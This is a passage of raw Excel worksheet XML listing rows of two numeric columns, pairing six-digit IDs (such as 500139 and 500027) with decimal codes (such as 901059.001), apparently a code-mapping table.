    <row r="2298" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2298" s="5">
        <v>500139</v>
      </c>
      <c r="B2298" s="3">
        <v>901098.00399999996</v>
      </c>
    </row>
    <row r="2299" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2299" s="5">
        <v>500139</v>
      </c>
      <c r="B2299" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="2300" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2300" s="5">
        <v>500139</v>
      </c>
      <c r="B2300" s="3">
        <v>901595.00100000005</v>
      </c>
    </row>
    <row r="2301" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2301" s="5">
        <v>500139</v>
      </c>
      <c r="B2301" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="2302" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2302" s="5">
        <v>500139</v>
      </c>
      <c r="B2302" s="3">
        <v>901071</v>
      </c>
    </row>
    <row r="2303" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2303" s="5">
        <v>500139</v>
      </c>
      <c r="B2303" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2304" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2304" s="5">
        <v>500139</v>
      </c>
      <c r="B2304" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2305" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2305" s="5">
        <v>500139</v>
      </c>
      <c r="B2305" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2306" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2306" s="5">
        <v>500139</v>
      </c>
      <c r="B2306" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2307" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2307" s="5">
        <v>500139</v>
      </c>
      <c r="B2307" s="3">
        <v>901059.00399999996</v>
      </c>
    </row>
    <row r="2308" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2308" s="5">
        <v>500139</v>
      </c>
      <c r="B2308" s="3">
        <v>901609</v>
      </c>
    </row>
    <row r="2309" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2309" s="5">
        <v>500139</v>
      </c>
      <c r="B2309" s="3">
        <v>901613</v>
      </c>
    </row>
    <row r="2310" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2310" s="5">
        <v>500139</v>
      </c>
      <c r="B2310" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="2311" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2311" s="5">
        <v>500139</v>
      </c>
      <c r="B2311" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="2312" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2312" s="5">
        <v>500139</v>
      </c>
      <c r="B2312" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="2313" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2313" s="5">
        <v>500139</v>
      </c>
      <c r="B2313" s="3">
        <v>901610</v>
      </c>
    </row>
    <row r="2314" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2314" s="5">
        <v>500139</v>
      </c>
      <c r="B2314" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="2315" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2315" s="5">
        <v>500139</v>
      </c>
      <c r="B2315" s="3">
        <v>901611</v>
      </c>
    </row>
    <row r="2316" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2316" s="5">
        <v>500139</v>
      </c>
      <c r="B2316" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="2317" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2317" s="5">
        <v>500139</v>
      </c>
      <c r="B2317" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="2318" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2318" s="5">
        <v>500139</v>
      </c>
      <c r="B2318" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="2319" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2319" s="5">
        <v>500139</v>
      </c>
      <c r="B2319" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="2320" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2320" s="5">
        <v>500139</v>
      </c>
      <c r="B2320" s="3">
        <v>901070.00199999998</v>
      </c>
    </row>
    <row r="2321" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2321" s="5">
        <v>500139</v>
      </c>
      <c r="B2321" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="2322" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2322" s="5">
        <v>500139</v>
      </c>
      <c r="B2322" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2323" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2323" s="5">
        <v>500139</v>
      </c>
      <c r="B2323" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2324" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2324" s="5">
        <v>500139</v>
      </c>
      <c r="B2324" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="2325" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2325" s="5">
        <v>500139</v>
      </c>
      <c r="B2325" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2326" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2326" s="5">
        <v>500139</v>
      </c>
      <c r="B2326" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="2327" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2327" s="5">
        <v>500139</v>
      </c>
      <c r="B2327" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2328" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2328" s="5">
        <v>500139</v>
      </c>
      <c r="B2328" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="2329" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2329" s="5">
        <v>500139</v>
      </c>
      <c r="B2329" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="2330" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2330" s="5">
        <v>500139</v>
      </c>
      <c r="B2330" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="2331" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2331" s="5">
        <v>500139</v>
      </c>
      <c r="B2331" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="2332" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2332" s="5">
        <v>500139</v>
      </c>
      <c r="B2332" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2333" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2333" s="5">
        <v>500139</v>
      </c>
      <c r="B2333" s="3">
        <v>901608.00100000005</v>
      </c>
    </row>
    <row r="2334" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2334" s="5">
        <v>500139</v>
      </c>
      <c r="B2334" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2335" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2335" s="5">
        <v>500139</v>
      </c>
      <c r="B2335" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2336" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2336" s="5">
        <v>500139</v>
      </c>
      <c r="B2336" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="2337" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2337" s="5">
        <v>500139</v>
      </c>
      <c r="B2337" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="2338" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2338" s="5">
        <v>500139</v>
      </c>
      <c r="B2338" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="2339" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2339" s="5">
        <v>500139</v>
      </c>
      <c r="B2339" s="3">
        <v>901552.005</v>
      </c>
    </row>
    <row r="2340" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2340" s="5">
        <v>500139</v>
      </c>
      <c r="B2340" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="2341" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2341" s="5">
        <v>500139</v>
      </c>
      <c r="B2341" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="2342" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2342" s="5">
        <v>500088</v>
      </c>
      <c r="B2342" s="3">
        <v>901583.00300000003</v>
      </c>
    </row>
    <row r="2343" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2343" s="5">
        <v>500088</v>
      </c>
      <c r="B2343" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2344" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2344" s="5">
        <v>500088</v>
      </c>
      <c r="B2344" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="2345" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2345" s="5">
        <v>500088</v>
      </c>
      <c r="B2345" s="3">
        <v>901546.01199999999</v>
      </c>
    </row>
    <row r="2346" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2346" s="5">
        <v>500088</v>
      </c>
      <c r="B2346" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="2347" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2347" s="5">
        <v>500088</v>
      </c>
      <c r="B2347" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2348" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2348" s="5">
        <v>500088</v>
      </c>
      <c r="B2348" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="2349" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2349" s="5">
        <v>500088</v>
      </c>
      <c r="B2349" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2350" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2350" s="5">
        <v>500088</v>
      </c>
      <c r="B2350" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="2351" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2351" s="5">
        <v>500088</v>
      </c>
      <c r="B2351" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="2352" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2352" s="5">
        <v>500088</v>
      </c>
      <c r="B2352" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2353" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2353" s="5">
        <v>500088</v>
      </c>
      <c r="B2353" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="2354" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2354" s="5">
        <v>500088</v>
      </c>
      <c r="B2354" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="2355" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2355" s="5">
        <v>500088</v>
      </c>
      <c r="B2355" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="2356" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2356" s="5">
        <v>500088</v>
      </c>
      <c r="B2356" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="2357" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2357" s="5">
        <v>500088</v>
      </c>
      <c r="B2357" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="2358" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2358" s="5">
        <v>500088</v>
      </c>
      <c r="B2358" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="2359" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2359" s="5">
        <v>500089</v>
      </c>
      <c r="B2359" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2360" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2360" s="5">
        <v>500089</v>
      </c>
      <c r="B2360" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2361" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2361" s="5">
        <v>500089</v>
      </c>
      <c r="B2361" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="2362" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2362" s="5">
        <v>500089</v>
      </c>
      <c r="B2362" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2363" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2363" s="5">
        <v>500089</v>
      </c>
      <c r="B2363" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2364" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2364" s="5">
        <v>500089</v>
      </c>
      <c r="B2364" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="2365" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2365" s="5">
        <v>500089</v>
      </c>
      <c r="B2365" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2366" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2366" s="5">
        <v>500028</v>
      </c>
      <c r="B2366" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2367" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2367" s="5">
        <v>500028</v>
      </c>
      <c r="B2367" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="2368" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2368" s="5">
        <v>500028</v>
      </c>
      <c r="B2368" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="2369" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2369" s="5">
        <v>500028</v>
      </c>
      <c r="B2369" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="2370" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2370" s="5">
        <v>500027</v>
      </c>
      <c r="B2370" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="2371" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2371" s="5">
        <v>500027</v>
      </c>
      <c r="B2371" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="2372" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2372" s="5">
        <v>500027</v>
      </c>
      <c r="B2372" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2373" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2373" s="5">
        <v>500027</v>
      </c>
      <c r="B2373" s="3">
        <v>901560.00199999998</v>
      </c>
    </row>
    <row r="2374" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2374" s="5">
        <v>500027</v>
      </c>
      <c r="B2374" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="2375" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2375" s="5">
        <v>500027</v>
      </c>
      <c r="B2375" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2376" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2376" s="5">
        <v>500027</v>
      </c>
      <c r="B2376" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2377" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2377" s="5">
        <v>500027</v>
      </c>
      <c r="B2377" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2378" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2378" s="5">
        <v>500027</v>
      </c>
      <c r="B2378" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="2379" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2379" s="5">
        <v>500027</v>
      </c>
      <c r="B2379" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="2380" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2380" s="5">
        <v>500027</v>
      </c>
      <c r="B2380" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="2381" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2381" s="5">
        <v>500027</v>
      </c>
      <c r="B2381" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="2382" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2382" s="5">
        <v>500027</v>
      </c>
      <c r="B2382" s="3">
        <v>901030</v>
      </c>
    </row>
    <row r="2383" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2383" s="5">
        <v>500027</v>
      </c>
      <c r="B2383" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="2384" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2384" s="5">
        <v>500027</v>
      </c>
      <c r="B2384" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2385" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2385" s="5">
        <v>500027</v>
      </c>
      <c r="B2385" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2386" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2386" s="5">
        <v>500027</v>
      </c>
      <c r="B2386" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="2387" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2387" s="5">
        <v>500027</v>
      </c>
      <c r="B2387" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="2388" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2388" s="5">
        <v>500027</v>
      </c>
      <c r="B2388" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="2389" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2389" s="5">
        <v>500027</v>
      </c>
      <c r="B2389" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="2390" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2390" s="5">
        <v>500027</v>
      </c>
      <c r="B2390" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="2391" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2391" s="5">
        <v>500027</v>
      </c>
      <c r="B2391" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="2392" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2392" s="5">
        <v>500027</v>
      </c>
      <c r="B2392" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2393" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2393" s="5">
        <v>500027</v>
      </c>
      <c r="B2393" s="3">
        <v>901070.005</v>
      </c>
    </row>
    <row r="2394" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2394" s="5">
        <v>500027</v>
      </c>
      <c r="B2394" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2395" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2395" s="5">
        <v>500027</v>
      </c>
      <c r="B2395" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="2396" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2396" s="5">
        <v>500027</v>
      </c>
      <c r="B2396" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="2397" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2397" s="5">
        <v>500027</v>
      </c>
      <c r="B2397" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="2398" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2398" s="5">
        <v>500027</v>
      </c>
      <c r="B2398" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2399" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2399" s="5">
        <v>500027</v>
      </c>
      <c r="B2399" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2400" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2400" s="5">
        <v>500027</v>
      </c>
      <c r="B2400" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="2401" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2401" s="5">
        <v>500027</v>
      </c>
      <c r="B2401" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="2402" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2402" s="5">
        <v>500027</v>
      </c>
      <c r="B2402" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="2403" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2403" s="5">
        <v>500027</v>
      </c>
      <c r="B2403" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="2404" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2404" s="5">
        <v>500027</v>
      </c>
      <c r="B2404" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="2405" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2405" s="5">
        <v>500027</v>
      </c>
      <c r="B2405" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="2406" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2406" s="5">
        <v>500027</v>
      </c>
      <c r="B2406" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="2407" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2407" s="5">
        <v>500027</v>
      </c>
      <c r="B2407" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="2408" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2408" s="5">
        <v>500027</v>
      </c>
      <c r="B2408" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="2409" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2409" s="5">
        <v>500027</v>
      </c>
      <c r="B2409" s="3">
        <v>901608.00199999998</v>
      </c>
    </row>
    <row r="2410" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2410" s="5">
        <v>500027</v>
      </c>
      <c r="B2410" s="3">
        <v>901608.00399999996</v>
      </c>
    </row>
    <row r="2411" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2411" s="5">
        <v>500027</v>
      </c>
      <c r="B2411" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2412" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2412" s="5">
        <v>500027</v>
      </c>
      <c r="B2412" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="2413" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2413" s="5">
        <v>500027</v>
      </c>
      <c r="B2413" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="2414" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2414" s="5">
        <v>500027</v>
      </c>
      <c r="B2414" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="2415" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2415" s="5">
        <v>500076</v>
      </c>
      <c r="B2415" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2416" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2416" s="5">
        <v>500076</v>
      </c>
      <c r="B2416" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="2417" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2417" s="5">
        <v>500076</v>
      </c>
      <c r="B2417" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2418" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2418" s="5">
        <v>500076</v>
      </c>
      <c r="B2418" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="2419" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2419" s="5">
        <v>500131</v>
      </c>
      <c r="B2419" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2420" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2420" s="5">
        <v>500131</v>
      </c>
      <c r="B2420" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="2421" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2421" s="5">
        <v>500131</v>
      </c>
      <c r="B2421" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2422" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2422" s="5">
        <v>500131</v>
      </c>
      <c r="B2422" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="2423" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2423" s="5">
        <v>500131</v>
      </c>
      <c r="B2423" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="2424" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2424" s="5">
        <v>500131</v>
      </c>
      <c r="B2424" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="2425" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2425" s="5">
        <v>500131</v>
      </c>
      <c r="B2425" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2426" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2426" s="5">
        <v>500131</v>
      </c>
      <c r="B2426" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="2427" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2427" s="5">
        <v>500131</v>
      </c>
      <c r="B2427" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="2428" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2428" s="5">
        <v>500131</v>
      </c>
      <c r="B2428" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="2429" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2429" s="5">
        <v>500131</v>
      </c>
      <c r="B2429" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="2430" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2430" s="5">
        <v>500131</v>
      </c>
      <c r="B2430" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2431" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2431" s="5">
        <v>500131</v>
      </c>
      <c r="B2431" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="2432" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2432" s="5">
        <v>500131</v>
      </c>
      <c r="B2432" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="2433" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2433" s="5">
        <v>500131</v>
      </c>
      <c r="B2433" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2434" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2434" s="5">
        <v>500134</v>
      </c>
      <c r="B2434" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="2435" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2435" s="5">
        <v>500134</v>
      </c>
      <c r="B2435" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2436" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2436" s="5">
        <v>500134</v>
      </c>
      <c r="B2436" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="2437" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2437" s="5">
        <v>500134</v>
      </c>
      <c r="B2437" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2438" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2438" s="5">
        <v>500134</v>
      </c>
      <c r="B2438" s="3">
        <v>901568</v>
      </c>
    </row>
    <row r="2439" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2439" s="5">
        <v>500134</v>
      </c>
      <c r="B2439" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2440" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2440" s="5">
        <v>500134</v>
      </c>
      <c r="B2440" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="2441" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2441" s="5">
        <v>500134</v>
      </c>
      <c r="B2441" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2442" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2442" s="5">
        <v>500134</v>
      </c>
      <c r="B2442" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2443" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2443" s="5">
        <v>500134</v>
      </c>
      <c r="B2443" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2444" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2444" s="5">
        <v>500134</v>
      </c>
      <c r="B2444" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="2445" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2445" s="5">
        <v>500134</v>
      </c>
      <c r="B2445" s="3">
        <v>901608.00399999996</v>
      </c>
    </row>
    <row r="2446" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2446" s="5">
        <v>500134</v>
      </c>
      <c r="B2446" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="2447" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2447" s="5">
        <v>500134</v>
      </c>
      <c r="B2447" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2448" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2448" s="5">
        <v>500081</v>
      </c>
      <c r="B2448" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2449" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2449" s="5">
        <v>500081</v>
      </c>
      <c r="B2449" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="2450" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2450" s="5">
        <v>500081</v>
      </c>
      <c r="B2450" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="2451" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2451" s="5">
        <v>500081</v>
      </c>
      <c r="B2451" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="2452" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2452" s="5">
